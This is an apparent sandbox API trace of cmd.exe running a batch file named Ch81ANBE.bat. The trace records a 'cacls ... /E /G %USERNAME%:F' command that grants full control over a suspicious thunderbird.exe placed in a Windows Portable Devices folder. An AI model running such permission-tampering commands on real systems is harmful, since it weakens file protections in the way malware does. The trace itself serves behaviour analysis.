_wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0178.135] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0178.135] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0178.135] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0178.135] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0178.135] GetProcessHeap () returned 0x590000 [0178.135] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2be0 | out: hHeap=0x590000) returned 1 [0178.135] GetEnvironmentStringsW () returned 0x5a2320* [0178.135] GetProcessHeap () returned 0x590000 [0178.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c80 [0178.136] FreeEnvironmentStringsW (penv=0x5a2320) returned 1 [0178.136] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.136] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.136] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.136] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.136] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.136] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.136] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.136] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.136] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0178.136] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.136] GetProcessHeap () returned 0x590000 [0178.136] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17d8 [0178.136] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0178.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26fb00, lpFilePart=0x26fafc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26fafc*="Desktop") returned 0x25 [0178.136] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0178.136] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f87c | out: lpFindFileData=0x26f87c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5770 [0178.136] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 [0178.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f87c | out: lpFindFileData=0x26f87c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5770 [0178.137] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 [0178.137] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0178.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f87c | out: lpFindFileData=0x26f87c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5770 [0178.137] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 [0178.137] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0178.137] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0178.137] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0178.137] GetProcessHeap () returned 0x590000 [0178.137] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c80 | out: hHeap=0x590000) returned 1 [0178.137] GetEnvironmentStringsW () returned 0x5a4190* [0178.137] GetProcessHeap () returned 0x590000 [0178.137] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5fb0 [0178.138] FreeEnvironmentStringsW (penv=0x5a4190) returned 1 [0178.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0178.138] GetProcessHeap () returned 0x590000 [0178.138] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17d8 | out: hHeap=0x590000) returned 1 [0178.138] GetProcessHeap () returned 0x590000 [0178.138] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6af0 [0178.138] GetProcessHeap () returned 0x590000 [0178.138] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf2) returned 0x5a2e60 [0178.139] GetProcessHeap () returned 0x590000 [0178.139] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aab08 [0178.139] GetProcessHeap () returned 0x590000 [0178.139] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aeb18 [0178.139] GetProcessHeap () returned 0x590000 [0178.140] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6af0 | out: hHeap=0x590000) returned 1 [0178.140] GetConsoleOutputCP () returned 0x1b5 [0178.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0178.141] GetUserDefaultLCID () returned 0x409 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc40, cchData=128 | out: lpLCData="0") returned 2 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc40, cchData=128 | out: lpLCData="0") returned 2 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc40, cchData=128 | out: lpLCData="1") returned 2 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0178.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0178.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0178.143] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.144] GetProcessHeap () returned 0x590000 [0178.144] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2f60 [0178.144] GetConsoleTitleW (in: lpConsoleTitle=0x5a2f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.144] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0178.145] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0178.145] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0178.145] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0178.146] GetProcessHeap () returned 0x590000 [0178.146] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6af0 [0178.146] GetProcessHeap () returned 0x590000 [0178.146] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6af0 | out: hHeap=0x590000) returned 1 [0178.149] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0178.149] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0178.149] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0178.149] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0178.149] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0178.149] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0178.149] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0178.149] GetProcessHeap () returned 0x590000 [0178.149] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3178 [0178.149] GetProcessHeap () returned 0x590000 [0178.149] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x5b2b40 [0178.153] GetProcessHeap () returned 0x590000 [0178.153] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x82) returned 0x5a31d8 [0178.154] GetConsoleTitleW (in: lpConsoleTitle=0x26f938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.154] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0178.155] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0178.155] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0178.155] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0178.155] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0178.155] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0178.155] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0178.155] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0178.155] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0178.155] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0178.155] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0178.155] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0178.155] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0178.155] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0178.155] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0178.155] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0178.155] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0178.155] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0178.156] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0178.156] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0178.156] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0178.156] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0178.156] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0178.156] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0178.156] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0178.156] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0178.156] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0178.156] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0178.156] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0178.156] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0178.156] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0178.156] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0178.156] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0178.156] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0178.156] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0178.156] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0178.156] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0178.156] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0178.156] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0178.156] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0178.156] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0178.157] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0178.157] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0178.157] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0178.157] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0178.157] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0178.157] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0178.157] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0178.157] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0178.157] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0178.157] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0178.157] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0178.157] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0178.157] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0178.157] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0178.157] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0178.157] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0178.157] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0178.158] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0178.158] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0178.158] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0178.158] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0178.158] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0178.158] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0178.158] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0178.158] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0178.158] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0178.158] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0178.158] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0178.158] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0178.158] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0178.158] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0178.158] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0178.158] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0178.158] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0178.158] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0178.158] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0178.158] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0178.158] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0178.158] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0178.158] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0178.159] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0178.159] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0178.159] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0178.159] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0178.159] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0178.159] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0178.159] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0178.159] GetProcessHeap () returned 0x590000 [0178.159] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a3268 [0178.159] GetProcessHeap () returned 0x590000 [0178.159] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xec) returned 0x5a3480 [0178.161] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0178.162] GetProcessHeap () returned 0x590000 [0178.162] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5907f0 [0178.162] SetErrorMode (uMode=0x0) returned 0x0 [0178.162] SetErrorMode (uMode=0x1) returned 0x0 [0178.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5907f8, lpFilePart=0x26f458 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f458*="Desktop") returned 0x25 [0178.162] SetErrorMode (uMode=0x0) returned 0x1 [0178.162] GetProcessHeap () returned 0x590000 [0178.162] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5907f0, Size=0x6e) returned 0x5907f0 [0178.163] GetProcessHeap () returned 0x590000 [0178.163] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5907f0) returned 0x6e [0178.163] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0178.163] GetProcessHeap () returned 0x590000 [0178.163] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5a) returned 0x5a3578 [0178.163] GetProcessHeap () returned 0x590000 [0178.163] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa8) returned 0x5a35e0 [0178.163] GetProcessHeap () returned 0x590000 [0178.164] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a35e0, Size=0x5a) returned 0x5a35e0 [0178.164] GetProcessHeap () returned 0x590000 [0178.164] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a35e0) returned 0x5a [0178.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.164] GetProcessHeap () returned 0x590000 [0178.164] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x590868 [0179.060] GetProcessHeap () returned 0x590000 [0179.060] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590868, Size=0x76) returned 0x590868 [0179.060] GetProcessHeap () returned 0x590000 [0179.060] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590868) returned 0x76 [0179.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.060] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x26f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f4) returned 0x5a3648 [0179.061] GetProcessHeap () returned 0x590000 [0179.061] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5a3688 [0179.061] FindClose (in: hFindFile=0x5a3648 | out: hFindFile=0x5a3648) returned 1 [0179.061] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0179.061] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0179.061] GetConsoleTitleW (in: lpConsoleTitle=0x26f6cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.061] GetProcessHeap () returned 0x590000 [0179.062] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x11c) returned 0x5908e8 [0179.062] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0179.062] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0179.062] IdentifyCodeAuthzLevelW () returned 0x1 [0179.072] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0179.072] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0179.072] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0179.072] CloseCodeAuthzLevel () returned 0x1 [0179.072] SetErrorMode (uMode=0x0) returned 0x0 [0179.072] SetErrorMode (uMode=0x1) returned 0x0 [0179.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x5a3270, lpFilePart=0x26f5b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x26f5b8*="Ch81ANBE.bat") returned 0x32 [0179.073] SetErrorMode (uMode=0x0) returned 0x1 [0179.073] GetProcessHeap () returned 0x590000 [0179.073] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x5b2bc0 [0179.073] wcsspn (_String=" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"", _Control=" \x09") returned 0x1 [0179.073] GetProcessHeap () returned 0x590000 [0179.073] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x80) returned 0x591140 [0179.073] GetProcessHeap () returned 0x590000 [0179.073] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf8) returned 0x5911c8 [0179.073] GetProcessHeap () returned 0x590000 [0179.073] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5911c8, Size=0x82) returned 0x5911c8 [0179.073] GetProcessHeap () returned 0x590000 [0179.074] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5911c8) returned 0x82 [0179.074] CmdBatNotification () returned 0x5a32d2 [0179.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0179.074] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0179.075] _get_osfhandle (_FileHandle=3) returned 0x78 [0179.075] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.075] _get_osfhandle (_FileHandle=3) returned 0x78 [0179.075] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.075] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0xe2, lpOverlapped=0x0) returned 1 [0179.077] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0179.077] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0179.079] _get_osfhandle (_FileHandle=3) returned 0x78 [0179.079] GetFileType (hFile=0x78) returned 0x1 [0179.079] _get_osfhandle (_FileHandle=3) returned 0x78 [0179.079] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0179.079] GetProcessHeap () returned 0x590000 [0179.080] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6af0 [0179.080] GetProcessHeap () returned 0x590000 [0179.080] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5b4b28 [0179.080] GetProcessHeap () returned 0x590000 [0179.080] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a5840 [0179.081] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0179.081] GetProcessHeap () returned 0x590000 [0179.081] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5840 | out: hHeap=0x590000) returned 1 [0179.081] GetProcessHeap () returned 0x590000 [0179.081] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0179.081] GetProcessHeap () returned 0x590000 [0179.081] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6af0 | out: hHeap=0x590000) returned 1 [0179.082] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0179.083] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0179.083] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0179.083] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0179.083] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0179.083] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0179.083] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0179.083] GetProcessHeap () returned 0x590000 [0179.083] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x591258 [0179.083] GetProcessHeap () returned 0x590000 [0179.083] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a4190 [0179.822] GetProcessHeap () returned 0x590000 [0179.822] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc2) returned 0x5a41b0 [0179.824] _tell (_FileHandle=3) returned 32 [0179.824] _close (_FileHandle=3) returned 0 [0179.824] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f3b4 | out: _Buffer="\r\n") returned 2 [0179.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.825] GetFileType (hFile=0x7) returned 0x2 [0179.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 